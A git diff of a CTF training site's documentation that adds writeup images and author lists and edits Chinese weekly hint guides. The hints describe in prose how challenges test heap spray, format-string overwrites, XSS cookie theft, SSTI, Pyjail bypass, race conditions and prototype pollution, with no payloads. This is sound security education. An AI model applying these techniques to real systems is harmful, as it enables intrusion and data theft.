b/docs/assets/images/wp/2025/week4/smart-contracts_3.png new file mode 100644 index 0000000..2235857 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/smart-contracts_3.png differ diff --git a/docs/assets/images/wp/2025/week4/traffic-sound-locate_1.png b/docs/assets/images/wp/2025/week4/traffic-sound-locate_1.png new file mode 100644 index 0000000..e2f4feb Binary files /dev/null and b/docs/assets/images/wp/2025/week4/traffic-sound-locate_1.png differ diff --git a/docs/assets/images/wp/2025/week4/traffic-sound-locate_2.png b/docs/assets/images/wp/2025/week4/traffic-sound-locate_2.png new file mode 100644 index 0000000..d7e044e Binary files /dev/null and b/docs/assets/images/wp/2025/week4/traffic-sound-locate_2.png differ diff --git a/docs/assets/images/wp/2025/week4/traffic-sound-locate_3.png b/docs/assets/images/wp/2025/week4/traffic-sound-locate_3.png new file mode 100644 index 0000000..45a6fae Binary files /dev/null and b/docs/assets/images/wp/2025/week4/traffic-sound-locate_3.png differ diff --git a/docs/assets/images/wp/2025/week4/traffic-sound-locate_4.png b/docs/assets/images/wp/2025/week4/traffic-sound-locate_4.png new file mode 100644 index 0000000..5e8bf3c Binary files /dev/null and b/docs/assets/images/wp/2025/week4/traffic-sound-locate_4.png differ diff --git a/docs/assets/images/wp/2025/week4/traffic-sound-locate_5.png b/docs/assets/images/wp/2025/week4/traffic-sound-locate_5.png new file mode 100644 index 0000000..b7a1918 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/traffic-sound-locate_5.png differ diff --git a/docs/assets/images/wp/2025/week4/traffic-sound-locate_6.png b/docs/assets/images/wp/2025/week4/traffic-sound-locate_6.png new file mode 100644 index 0000000..eb035a6 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/traffic-sound-locate_6.png differ diff --git a/docs/assets/images/wp/2025/week4/traffic-sound-locate_7.png b/docs/assets/images/wp/2025/week4/traffic-sound-locate_7.png new file mode 100644 index 0000000..8ea4021 Binary files /dev/null and b/docs/assets/images/wp/2025/week4/traffic-sound-locate_7.png differ diff --git a/docs/assets/images/wp/2025/week5/abandoned-site_1.png b/docs/assets/images/wp/2025/week5/abandoned-site_1.png new file mode 100644 index 0000000..d954b0a Binary files /dev/null and b/docs/assets/images/wp/2025/week5/abandoned-site_1.png differ diff --git a/docs/assets/images/wp/2025/week5/ai-hacker_1.png b/docs/assets/images/wp/2025/week5/ai-hacker_1.png new file mode 100644 index 0000000..98eb1ed Binary files /dev/null and b/docs/assets/images/wp/2025/week5/ai-hacker_1.png differ diff --git a/docs/assets/images/wp/2025/week5/ai-hacker_2.png b/docs/assets/images/wp/2025/week5/ai-hacker_2.png new file mode 100644 index 0000000..87b1e08 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/ai-hacker_2.png differ diff --git a/docs/assets/images/wp/2025/week5/ai-hacker_3.png b/docs/assets/images/wp/2025/week5/ai-hacker_3.png new file mode 100644 index 0000000..e60fffa Binary files /dev/null and b/docs/assets/images/wp/2025/week5/ai-hacker_3.png differ diff --git a/docs/assets/images/wp/2025/week5/ai-hacker_4.png b/docs/assets/images/wp/2025/week5/ai-hacker_4.png new file mode 100644 index 0000000..531d89a Binary files /dev/null and b/docs/assets/images/wp/2025/week5/ai-hacker_4.png differ diff --git a/docs/assets/images/wp/2025/week5/binary-blog_1.png b/docs/assets/images/wp/2025/week5/binary-blog_1.png new file mode 100644 index 0000000..3eb69fc Binary files /dev/null and b/docs/assets/images/wp/2025/week5/binary-blog_1.png differ diff --git a/docs/assets/images/wp/2025/week5/binary-blog_10.png b/docs/assets/images/wp/2025/week5/binary-blog_10.png new file mode 100644 index 0000000..4e5a53d Binary files /dev/null and b/docs/assets/images/wp/2025/week5/binary-blog_10.png differ diff --git a/docs/assets/images/wp/2025/week5/binary-blog_11.png b/docs/assets/images/wp/2025/week5/binary-blog_11.png new file mode 100644 index 0000000..031140f Binary files /dev/null and b/docs/assets/images/wp/2025/week5/binary-blog_11.png differ diff --git a/docs/assets/images/wp/2025/week5/binary-blog_12.png b/docs/assets/images/wp/2025/week5/binary-blog_12.png new file mode 100644 index 0000000..c64ab85 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/binary-blog_12.png differ diff --git a/docs/assets/images/wp/2025/week5/binary-blog_2.png b/docs/assets/images/wp/2025/week5/binary-blog_2.png new file mode 100644 index 0000000..3630ccd Binary files /dev/null and b/docs/assets/images/wp/2025/week5/binary-blog_2.png differ diff --git a/docs/assets/images/wp/2025/week5/binary-blog_3.png b/docs/assets/images/wp/2025/week5/binary-blog_3.png new file mode 100644 index 0000000..6ced101 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/binary-blog_3.png differ diff --git a/docs/assets/images/wp/2025/week5/binary-blog_4.png b/docs/assets/images/wp/2025/week5/binary-blog_4.png new file mode 100644 index 0000000..87397dc Binary files /dev/null and b/docs/assets/images/wp/2025/week5/binary-blog_4.png differ diff --git a/docs/assets/images/wp/2025/week5/binary-blog_5.png b/docs/assets/images/wp/2025/week5/binary-blog_5.png new file mode 100644 index 0000000..a1fa8fb Binary files /dev/null and b/docs/assets/images/wp/2025/week5/binary-blog_5.png differ diff --git a/docs/assets/images/wp/2025/week5/binary-blog_6.png b/docs/assets/images/wp/2025/week5/binary-blog_6.png new file mode 100644 index 0000000..3e9d99a Binary files /dev/null and b/docs/assets/images/wp/2025/week5/binary-blog_6.png differ diff --git a/docs/assets/images/wp/2025/week5/binary-blog_7.png b/docs/assets/images/wp/2025/week5/binary-blog_7.png new file mode 100644 index 0000000..4f397f1 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/binary-blog_7.png differ diff --git a/docs/assets/images/wp/2025/week5/binary-blog_8.png b/docs/assets/images/wp/2025/week5/binary-blog_8.png new file mode 100644 index 0000000..d982614 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/binary-blog_8.png differ diff --git a/docs/assets/images/wp/2025/week5/binary-blog_9.png b/docs/assets/images/wp/2025/week5/binary-blog_9.png new file mode 100644 index 0000000..ed4c62b Binary files /dev/null and b/docs/assets/images/wp/2025/week5/binary-blog_9.png differ diff --git a/docs/assets/images/wp/2025/week5/fuduji-back_1.png b/docs/assets/images/wp/2025/week5/fuduji-back_1.png new file mode 100644 index 0000000..a4122ca Binary files /dev/null and b/docs/assets/images/wp/2025/week5/fuduji-back_1.png differ diff --git a/docs/assets/images/wp/2025/week5/fuduji-back_10.png b/docs/assets/images/wp/2025/week5/fuduji-back_10.png new file mode 100644 index 0000000..db7fd64 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/fuduji-back_10.png differ diff --git a/docs/assets/images/wp/2025/week5/fuduji-back_2.png b/docs/assets/images/wp/2025/week5/fuduji-back_2.png new file mode 100644 index 0000000..10300f4 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/fuduji-back_2.png differ diff --git a/docs/assets/images/wp/2025/week5/fuduji-back_3.png b/docs/assets/images/wp/2025/week5/fuduji-back_3.png new file mode 100644 index 0000000..ec6c01f Binary files /dev/null and b/docs/assets/images/wp/2025/week5/fuduji-back_3.png differ diff --git a/docs/assets/images/wp/2025/week5/fuduji-back_4.png b/docs/assets/images/wp/2025/week5/fuduji-back_4.png new file mode 100644 index 0000000..f4f9402 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/fuduji-back_4.png differ diff --git a/docs/assets/images/wp/2025/week5/fuduji-back_5.png b/docs/assets/images/wp/2025/week5/fuduji-back_5.png new file mode 100644 index 0000000..e581cfc Binary files /dev/null and b/docs/assets/images/wp/2025/week5/fuduji-back_5.png differ diff --git a/docs/assets/images/wp/2025/week5/fuduji-back_6.png b/docs/assets/images/wp/2025/week5/fuduji-back_6.png new file mode 100644 index 0000000..172a08e Binary files /dev/null and b/docs/assets/images/wp/2025/week5/fuduji-back_6.png differ diff --git a/docs/assets/images/wp/2025/week5/fuduji-back_7.png b/docs/assets/images/wp/2025/week5/fuduji-back_7.png new file mode 100644 index 0000000..4aac3af Binary files /dev/null and b/docs/assets/images/wp/2025/week5/fuduji-back_7.png differ diff --git a/docs/assets/images/wp/2025/week5/fuduji-back_8.png b/docs/assets/images/wp/2025/week5/fuduji-back_8.png new file mode 100644 index 0000000..05c3249 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/fuduji-back_8.png differ diff --git a/docs/assets/images/wp/2025/week5/fuduji-back_9.png b/docs/assets/images/wp/2025/week5/fuduji-back_9.png new file mode 100644 index 0000000..e930bce Binary files /dev/null and b/docs/assets/images/wp/2025/week5/fuduji-back_9.png differ diff --git a/docs/assets/images/wp/2025/week5/go-question_1.png b/docs/assets/images/wp/2025/week5/go-question_1.png new file mode 100644 index 0000000..3146a53 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/go-question_1.png differ diff --git a/docs/assets/images/wp/2025/week5/go-question_2.png b/docs/assets/images/wp/2025/week5/go-question_2.png new file mode 100644 index 0000000..21cd2a2 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/go-question_2.png differ diff --git a/docs/assets/images/wp/2025/week5/go-question_3.png b/docs/assets/images/wp/2025/week5/go-question_3.png new file mode 100644 index 0000000..9bd4a60 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/go-question_3.png differ diff --git a/docs/assets/images/wp/2025/week5/intbug-chain_1.png b/docs/assets/images/wp/2025/week5/intbug-chain_1.png new file mode 100644 index 0000000..c9696d8 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/intbug-chain_1.png differ diff --git a/docs/assets/images/wp/2025/week5/mikumiku-1_1.png b/docs/assets/images/wp/2025/week5/mikumiku-1_1.png new file mode 100644 index 0000000..7501fd4 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/mikumiku-1_1.png differ diff --git a/docs/assets/images/wp/2025/week5/mikumiku-1_2.png b/docs/assets/images/wp/2025/week5/mikumiku-1_2.png new file mode 100644 index 0000000..a4bee74 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/mikumiku-1_2.png differ diff --git a/docs/assets/images/wp/2025/week5/mikumiku-1_3.png b/docs/assets/images/wp/2025/week5/mikumiku-1_3.png new file mode 100644 index 0000000..17d1961 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/mikumiku-1_3.png differ diff --git a/docs/assets/images/wp/2025/week5/mikumiku-2_1.png b/docs/assets/images/wp/2025/week5/mikumiku-2_1.png new file mode 100644 index 0000000..92b4bee Binary files /dev/null and b/docs/assets/images/wp/2025/week5/mikumiku-2_1.png differ diff --git a/docs/assets/images/wp/2025/week5/mikumiku-2_2.png b/docs/assets/images/wp/2025/week5/mikumiku-2_2.png new file mode 100644 index 0000000..f17e5e9 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/mikumiku-2_2.png differ diff --git a/docs/assets/images/wp/2025/week5/mikumiku-3_1.png b/docs/assets/images/wp/2025/week5/mikumiku-3_1.png new file mode 100644 index 0000000..566c93a Binary files /dev/null and b/docs/assets/images/wp/2025/week5/mikumiku-3_1.png differ diff --git a/docs/assets/images/wp/2025/week5/mikumiku-3_2.png b/docs/assets/images/wp/2025/week5/mikumiku-3_2.png new file mode 100644 index 0000000..465951d Binary files /dev/null and b/docs/assets/images/wp/2025/week5/mikumiku-3_2.png differ diff --git a/docs/assets/images/wp/2025/week5/note_1.jpg b/docs/assets/images/wp/2025/week5/note_1.jpg new file mode 100644 index 0000000..d694ede Binary files /dev/null and b/docs/assets/images/wp/2025/week5/note_1.jpg differ diff --git a/docs/assets/images/wp/2025/week5/note_2.jpg b/docs/assets/images/wp/2025/week5/note_2.jpg new file mode 100644 index 0000000..96f2870 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/note_2.jpg differ diff --git a/docs/assets/images/wp/2025/week5/note_3.jpg b/docs/assets/images/wp/2025/week5/note_3.jpg new file mode 100644 index 0000000..41d4c4b Binary files /dev/null and b/docs/assets/images/wp/2025/week5/note_3.jpg differ diff --git a/docs/assets/images/wp/2025/week5/note_4.jpg b/docs/assets/images/wp/2025/week5/note_4.jpg new file mode 100644 index 0000000..8f20462 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/note_4.jpg differ diff --git a/docs/assets/images/wp/2025/week5/note_5.jpg b/docs/assets/images/wp/2025/week5/note_5.jpg new file mode 100644 index 0000000..11de49c Binary files /dev/null and b/docs/assets/images/wp/2025/week5/note_5.jpg differ diff --git a/docs/assets/images/wp/2025/week5/note_6.jpg b/docs/assets/images/wp/2025/week5/note_6.jpg new file mode 100644 index 0000000..58fc5e9 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/note_6.jpg differ diff --git a/docs/assets/images/wp/2025/week5/note_7.png b/docs/assets/images/wp/2025/week5/note_7.png new file mode 100644 index 0000000..8629dfd Binary files /dev/null and b/docs/assets/images/wp/2025/week5/note_7.png differ diff --git a/docs/assets/images/wp/2025/week5/stdout_1.png b/docs/assets/images/wp/2025/week5/stdout_1.png new file mode 100644 index 0000000..ddae5db Binary files /dev/null and b/docs/assets/images/wp/2025/week5/stdout_1.png differ diff --git a/docs/assets/images/wp/2025/week5/stdout_2.png b/docs/assets/images/wp/2025/week5/stdout_2.png new file mode 100644 index 0000000..1db36f8 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/stdout_2.png differ diff --git a/docs/assets/images/wp/2025/week5/stdout_3.png b/docs/assets/images/wp/2025/week5/stdout_3.png new file mode 100644 index 0000000..1396187 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/stdout_3.png differ diff --git a/docs/assets/images/wp/2025/week5/stdout_4.png b/docs/assets/images/wp/2025/week5/stdout_4.png new file mode 100644 index 0000000..e50e1bc Binary files /dev/null and b/docs/assets/images/wp/2025/week5/stdout_4.png differ diff --git a/docs/assets/images/wp/2025/week5/stdout_5.png b/docs/assets/images/wp/2025/week5/stdout_5.png new file mode 100644 index 0000000..ddb59f7 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/stdout_5.png differ diff --git a/docs/assets/images/wp/2025/week5/stdout_6.png b/docs/assets/images/wp/2025/week5/stdout_6.png new file mode 100644 index 0000000..a371f3c Binary files /dev/null and b/docs/assets/images/wp/2025/week5/stdout_6.png differ diff --git a/docs/assets/images/wp/2025/week5/time-hacker_1.png b/docs/assets/images/wp/2025/week5/time-hacker_1.png new file mode 100644 index 0000000..2215fab Binary files /dev/null and b/docs/assets/images/wp/2025/week5/time-hacker_1.png differ diff --git a/docs/assets/images/wp/2025/week5/time-hacker_2.png b/docs/assets/images/wp/2025/week5/time-hacker_2.png new file mode 100644 index 0000000..69ba2ba Binary files /dev/null and b/docs/assets/images/wp/2025/week5/time-hacker_2.png differ diff --git a/docs/assets/images/wp/2025/week5/time-hacker_3.png b/docs/assets/images/wp/2025/week5/time-hacker_3.png new file mode 100644 index 0000000..01d3af3 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/time-hacker_3.png differ diff --git a/docs/assets/images/wp/2025/week5/time-hacker_4.png b/docs/assets/images/wp/2025/week5/time-hacker_4.png new file mode 100644 index 0000000..20fdb9f Binary files /dev/null and b/docs/assets/images/wp/2025/week5/time-hacker_4.png differ diff --git a/docs/assets/images/wp/2025/week5/time-hacker_5.png b/docs/assets/images/wp/2025/week5/time-hacker_5.png new file mode 100644 index 0000000..61df0d3 Binary files /dev/null and b/docs/assets/images/wp/2025/week5/time-hacker_5.png differ diff --git a/docs/assets/images/wp/2025/week5/time-hacker_6.png b/docs/assets/images/wp/2025/week5/time-hacker_6.png new file mode 100644 index 0000000..2b0409c Binary files /dev/null and b/docs/assets/images/wp/2025/week5/time-hacker_6.png differ diff --git a/docs/guide/2025/week1.md b/docs/guide/2025/week1.md index 431f605..f06fbc8 100644 --- a/docs/guide/2025/week1.md +++ b/docs/guide/2025/week1.md @@ -47,7 +47,6 @@ IDA 将一直伴随逆向之旅,祝你玩得开心! 如果你完全不了解什么是 HTTP 协议,你可以查看 [MDN](https://developer.mozilla.org/zh-CN/docs/Web/HTTP) 的有关内容,来了解更多。 - 如果你了解空洞骑士,你应该知道骨钉大师一共有三位,对应题目的三个关卡。每一个关卡中都存在各种提示来帮助你完成这个题目。 @@ -64,7 +63,6 @@ IDA 将一直伴随逆向之旅,祝你玩得开心! 本题设计 DELETE 方法的部分内容并不符合[协议标准](https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Reference/Methods/DELETE)。请大家在后续遇到 DELETE 方法时不要被本题误导。 - ## Misc diff --git a/docs/guide/2025/week2.md b/docs/guide/2025/week2.md index 9c51f51..d41188e 100644 --- a/docs/guide/2025/week2.md +++ b/docs/guide/2025/week2.md @@ -30,7 +30,6 @@ Week2 是从零到一的迈进,你将在这一周接触到主流 CTF 比赛的 沙箱(Sandbox)是一种隔离的执行环境,通过虚拟化或模拟技术,限制程序对真实系统资源的访问。 - 简单来说,就是设定了特殊的规则,指定了程序能做什么或者不能做什么。 @@ -129,7 +128,6 @@ int main() { 自动化测试与绕过工具:[SQLmap](https://github.com/sqlmapproject/sqlmap). 在学习阶段,不建议直接使用自动化工具,建议手工测试。理解注入原理后,可以使用自动化工具取代人工繁琐的工作。 - diff --git a/docs/guide/2025/week3.md b/docs/guide/2025/week3.md index 5918376..d7ffcb7 100644 --- a/docs/guide/2025/week3.md +++ b/docs/guide/2025/week3.md @@ -23,7 +23,6 @@ Week3 是一场蜕变,如果你对出现的题目感到迷茫,你可以查 本题考查了 SROP、栈迁移、orw 的知识点。 - 在开始此题之前,你需要先了解以下内容: @@ -54,7 +53,6 @@ Week3 是一场蜕变,如果你对出现的题目感到迷茫,你可以查 本题考查了选手对于 SSTI 最基础的构造方法。 - 本题给予了完整的 Docker 环境附件,你可以在 Linux 上安装 Docker 环境来进行使用(官方安装教程:[Install Docker](https://docs.docker.com/engine/install/ubuntu/))。 @@ -66,7 +64,6 @@ Week3 是一场蜕变,如果你对出现的题目感到迷茫,你可以查 本题考查了选手对于 PyJail 的掌握,以及对过滤字符的绕过能力。 - 可参阅 dummykitty 总结的文章 [CTF Pyjail 沙箱逃逸绕过合集](https://dummykitty.github.io/posts/python-沙箱逃逸绕过/)来进行学习。 diff --git a/docs/guide/2025/week4.md b/docs/guide/2025/week4.md index 498a7cf..342c04a 100644 --- a/docs/guide/2025/week4.md +++ b/docs/guide/2025/week4.md @@ -23,7 +23,6 @@ import 'element-plus/es/components/tooltip/style/css' 本题考查简单的堆喷概念。 - 尝试直接通过栈溢出覆盖返回地址会发现这是一个正常情况下的非法地址。 @@ -46,17 +45,17 @@ import 'element-plus/es/components/tooltip/style/css' :::tip -- C 函数的局部变量通常存储在哪里?c 函数局部变量的地址通常是根据哪个寄存器偏移得到的? +- C 函数的局部变量通常存储在哪里?C 函数局部变量的地址通常是根据哪个寄存器偏移得到的? - 修改函数的栈底会对函数局部变量布局造成什么影响? - 本题预期解无需 leak 任何地址。 - ::: + +::: ### fmt&got 本题考查利用格式化字符串漏洞覆盖内存。 - 相信做完 Week3 的「fmt&canary」之后,你对「格式化字符串漏洞」以及「如何利用格式化字符串漏洞来泄露内存」有了一定的了解,在开始做这道题之前,你可以再了解一下: @@ -73,7 +72,6 @@ import 'element-plus/es/components/tooltip/style/css' 本题考查基础 XSS 以及绕过。 - 为了获取到小 E 浏览器内的 cookie,我们需要进行跨站脚本攻击(XSS)。一般 xss 需要逃逸出当前属性或标签,利用特殊标签(例如 script)或者属性(例如 onerror,onfocus 等)来执行 JavaScript。但并不是所有题目都能逃逸出标签从而引入恶意标签,因此可以考虑如何闭合属性并引入恶意属性来执行 JavaScript。 @@ -94,7 +92,7 @@ import 'element-plus/es/components/tooltip/style/css' 本题具有类似的原理,但是实践方式更简单,你需要在特定的位置注入你的恶意代码,然后想办法将其保存在可被执行的位置。 -本题根目录下的 flag 文件被保护了起来,你需要通过执行 `readflag` 来获得 flag. +本题根目录下的 `flag` 文件被保护了起来,你需要通过执行 `readflag` 来获得 FLAG. ::: tip 本题给予了完整的 Docker 环境附件,你可以在 Linux 上安装 Docker 环境来进行使用(官方安装教程:[Install Docker](https://docs.docker.com/engine/install/ubuntu/))。 diff --git a/docs/guide/2025/week5.md b/docs/guide/2025/week5.md index cfe0068..fd0b922 100644 --- a/docs/guide/2025/week5.md +++ b/docs/guide/2025/week5.md @@ -23,7 +23,6 @@ import 'element-plus/es/components/tooltip/style/css' 本题考查利用非栈上格式化字符串漏洞泄露及覆盖内存。 - 相信经过前两周的历练,你应该对格式化字符串漏洞利用比较熟悉了。对于常规的栈上格式化字符串漏洞,可以任意构造自己的恶意数据来实现任意地址写,但是对于非栈上变量来说,就无法直接给出目的地址的指针。此时你就需要留意栈上残留的内容,看看能不能找到可以利用的点。 @@ -35,7 +34,6 @@ import 'element-plus/es/components/tooltip/style/css' 本题考查 `_IO_FILE` 结构体利用。 - 在开始做这道题之前,你可以先了解一下 [FILE 结构](https://ctf-wiki.org/pwn/linux/user-mode/io-file/introduction/)。 @@ -53,7 +51,6 @@ import 'element-plus/es/components/tooltip/style/css' 本题考查了「条件竞争」漏洞的简单利用。 - 本题给出了服务的源码,你需要找出服务中存在的**条件竞争点**,并且通过条件竞争点来合理编写脚本来对服务进行攻击。 @@ -63,23 +60,21 @@ import 'element-plus/es/components/tooltip/style/css' 本题考查了选手对于 Java Spring 中的 jar 包进行分析的能力。 - -在本题中,你需要学习如何将 Java Spring 题目中给出的 jar 包反编译成能够阅读的 java 伪代码。 +在本题中,你需要学习如何将 Java Spring 题目中给出的 jar 包反编译成能够阅读的 Java 伪代码。 推荐使用 JetBrains 公司的 [IDEA](https://www.jetbrains.com/zh-cn/idea/download/?section=windows) 来完成这个操作。 -本题将会是你迈向 java 学习的一小步。 +本题将会是你迈向 Java 学习的一小步。 ### 小 W 和小 K 的故事(最终章) -本题考查了 nodejs 中的「原型链污染」漏洞。 - +本题考查了 Node.js 中的「原型链污染」漏洞。 尝试找出服务中存在的各个模块中,可能造成原型链污染的方法,并且上网搜寻其相关内容。 -当我们在对大多数服务(特别是 go,nodejs,python 等强模块相关的语言)进行渗透时,通常需要了解该服务中所利用到的模块的版本信息,并且根据模块版本信息来上网搜寻相关的 CVE,或者查询 github 上的历史 commit 中被修改掉的内容,很可能就是解题的关键。 +当我们在对大多数服务(特别是 Go、Node.js、Python 等强模块相关的语言)进行渗透时,通常需要了解该服务中所利用到的模块的版本信息,并且根据模块版本信息来上网搜寻相关的 CVE,或者查询 Github 上的历史 commit 中被修改掉的内容,很可能就是解题的关键。 diff --git a/docs/wp/2024/AuthorList.vue b/docs/wp/2024/AuthorList.vue index 4ac4eec..f803dd3 100644 --- a/docs/wp/2024/AuthorList.vue +++ b/docs/wp/2024/AuthorList.vue @@ -16,7 +16,7 @@ const vprops = withDefaults( { keys: () => Object.keys(authors), title_tmpl: (key: string) => { - return `Week ${key.replace(/[^\d]/g, "")} 出题人`; + return `Week ${key.replace(/[^\d]/g, "")}`; }, lables: () => ["题目名称", "方向", "出题人"], props: () => ["name", "category", "author"], @@ -64,4 +64,13 @@ const vprops = withDefaults( .author-list td { --el-table-border-color: var(--vp-c-divider); } + +.author-list { + .el-collapse-item__header { + padding-left: 8px; + } + .el-collapse-item__content { + padding-bottom: 0; + } +} diff --git a/docs/wp/2024/author-list.json b/docs/wp/2024/author-list.json index 7707691..90ad1c7 100644 --- a/docs/wp/2024/author-list.json +++ b/docs/wp/2024/author-list.json @@ -4,20 +4,24 @@ { "name": "Game", "category": "Pwn", "author": "korey" }, { "name": "overwrite", "category": "Pwn", "author": "korey" }, { "name": "gdb", "category": "Pwn", "author": "inkey" }, + { "name": "base64", "category": "Reverse", "author": "0xA1pha" }, { "name": "ezAndroidStudy", "category": "Reverse", "author": "PangBai" }, { "name": "Simple_encryption", "category": "Reverse", "author": "tgrddf55" }, { "name": "ez_debug", "category": "Reverse", "author": "kw17" }, { "name": "begin", "category": "Reverse", "author": "tgrddf55" }, + { "name": "headach3", "category": "Web", "author": "D0ubleD" }, { "name": "智械危机", "category": "Web", "author": "D0ubleD" }, { "name": "会赢吗", "category": "Web", "author": "void2eye" }, { "name": "PangBai 过家家(1)", "category": "Web", "author": "Cnily03" }, { "name": "谢谢皮蛋", "category": "Web", "author": "fr3e3" }, + { "name": "xor", "category": "Crypto", "author": "Zechariah" }, { "name": "Base", "category": "Crypto", "author": "6pc1" }, { "name": "一眼秒了", "category": "Crypto", "author": "jingyi" }, { "name": "Strange King", "category": "Crypto", "author": "Zechariah" }, + { "name": "WhereIsFlag", "category": "Misc", "author": "yixinBC" }, { "name": "Labyrinth", "category": "Misc", "author": "MonianHello" }, { "name": "decompress", "category": "Misc", "author": "yixinBC" }, @@ -30,21 +34,25 @@ { "name": "easy fmt", "category": "Pwn", "author": "korey" }, { "name": "ez_game", "category": "Pwn", "author": "a1te" }, { "name": "Bad Asm", "category": "Pwn", "author": "0xAkyOI" }, + { "name": "PangBai 泰拉记(1)", "category": "Reverse", "author": "straw" }, { "name": "Dirty_flowers", "category": "Reverse", "author": "tgrddf55" }, { "name": "UPX", "category": "Reverse", "author": "nuthecz" }, { "name": "Ptrace", "category": "Reverse", "author": "nuthecz" }, { "name": "drink_TEA", "category": "Reverse", "author": "Chovy" }, { "name": "ezencrypt", "category": "Reverse", "author": "PangBai" }, + { "name": "谢谢皮蛋 plus", "category": "Web", "author": "fr3e3" }, { "name": "你能在一秒内打出八句英文吗", "category": "Web", "author": "MonianHello" }, { "name": "复读机", "category": "Web", "author": "AsaL1n" }, { "name": "遗失的拉链", "category": "Web", "author": "AsaL1n" }, { "name": "PangBai 过家家(2)", "category": "Web", "author": "Cnily03" }, + { "name": "这是几次方?疑惑!", "category": "Crypto", "author": "saga131" }, { "name": "Since you konw something", "category": "Crypto", "author": "Zechariah" }, { "name": "茶里茶气", "category": "Crypto", "author": "coperlm" }, { "name": "Just one and more than two", "category": "Crypto", "author": "Zechariah" }, + { "name": "用溯流仪见证伏特台风", "category": "Misc", "author": "Zechariah" }, { "name": "你也玩原神吗", "category": "Misc", "author": "Findkey" }, { "name": "字里行间的秘密", "category": "Misc", "author": "Red Orange" }, @@ -58,6 +66,7 @@ { "name": "Easy_Shellcode", "category": "Pwn", "author": "inkey" }, { "name": "EZcanary", "category": "Pwn", "author": "qy" }, { "name": "One Last B1te", "category": "Pwn", "author": "0xAkyOI" }, + { "name": "simpleAndroid", "category": "Reverse", "author": "nuthecz" }, { "name": "SecertsOfKawaii", "category": "Reverse", "author": "PangBai" }, { "name": "PangBai 过家家(3)", "category": "Reverse", "author": "0xA1pha" }, @@ -65,16 +74,19 @@ { "name": "011vm", "category": "Reverse", "author": "kw17" }, { "name": "flowering_shrubs", "category": "Reverse", "author": "tgrddf55" }, { "name": "SMc_math", "category": "Reverse", "author": "tgrddf55" }, + { "name": "这「照片」是你吗", "category": "Web", "author": "D0ubleD" }, { "name": "Include Me", "category": "Web", "author": "Ewoji" }, { "name": "臭皮的计算机", "category": "Web", "author": "void2eye" }, { "name": "blindsql1", "category": "Web", "author": "unk" }, { "name": "臭皮踩踩背", "category": "Web", "author": "void2eye" }, + { "name": "故事新编 1", "category": "Crypto", "author": "vil10n" }, { "name": "故事新编 2", "category": "Crypto", "author": "vil10n" }, { "name": "不用谢喵", "category": "Crypto", "author": "Zechariah" }, { "name": "两个黄鹂鸣翠柳", "category": "Crypto", "author": "lxdy3361mm0" }, { "name": "没 e 这能玩?", "category": "Crypto", "author": "coperlm" }, + { "name": "BGM 坏了吗?", "category": "Misc", "author": "1b5lda" }, { "name": "ez_jail", "category": "Misc", "author": "yixinBC" }, { "name": "AmazingGame", "category": "Misc", "author": "PangBai" }, @@ -85,20 +97,24 @@ { "name": "Maze_Rust", "category": "Pwn", "author": "inkey" }, { "name": "MakeHero", "category": "Pwn", "author": "inkey" }, { "name": "Sign in", "category": "Pwn", "author": "inkey" }, + { "name": "PlzDebugMe", "category": "Reverse", "author": "PangBai" }, { "name": "ezrust", "category": "Reverse", "author": "ATRI" }, { "name": "MazE", "category": "Reverse", "author": "tgrddf55" }, { "name": "easygui", "category": "Reverse", "author": "tgrddf55" }, { "name": "洞 OVO", "category": "Reverse", "author": "Ajarbox" }, + { "name": "ezpollute", "category": "Web", "author": "D1anash1ba" }, { "name": "ezcmsss", "category": "Web", "author": "gdd" }, { "name": "chocolate", "category": "Web", "author": "CH0ico" }, { "name": "blindsql2", "category": "Web", "author": "unk" }, { "name": "PangBai 过家家(4)", "category": "Web", "author": "Cnily03" }, { "name": "隐藏的密码", "category": "Web", "author": "caef11" }, + { "name": "欧拉欧拉!!", "category": "Crypto", "author": "saga131" }, { "name": "圣石匕首", "category": "Crypto", "author": "vil10n" }, { "name": "俱以我之名", "category": "Crypto", "author": "Zechariah" }, + { "name": "ezblockchain", "category": "Misc", "author": "lrhtony" }, { "name": "Alt", "category": "Misc", "author": "yixinBC" }, { "name": "扫码领取 flag", "category": "Misc", "author": "CH0ico" }, diff --git a/docs/wp/2024/index.md b/docs/wp/2024/index.md index 2a41b8d..0bc92af 100644 --- a/docs/wp/2024/index.md +++ b/docs/wp/2024/index.md @@ -2,6 +2,7 @@ title: WriteUp titleTemplate: ":title - NewStar CTF 2024" comments: false +aside: false --- + + + + diff --git a/docs/wp/2025/ContributionList.vue b/docs/wp/2025/ContributionList.vue new file mode 100644 index 0000000..b485acf --- /dev/null +++ b/docs/wp/2025/ContributionList.vue @@ -0,0 +1,145 @@ + + + + + diff --git a/docs/wp/2025/author-list.json b/docs/wp/2025/author-list.json new file mode 100644 index 0000000..f2fb583 --- /dev/null +++ b/docs/wp/2025/author-list.json @@ -0,0 +1,884 @@ +{ + "week1": [ + { + "name": "Pwn's Door", + "category": "Pwn", + "author": "Findkey", + "inspectors": ["L1nk", "Sally", "sysNow"] + }, + { + "name": "GNU Debugger", + "category": "Pwn", + "author": "L1nk", + "inspectors": ["s1eepy", "KAMIYA"] + }, + { + "name": "INTbug", + "category": "Pwn", + 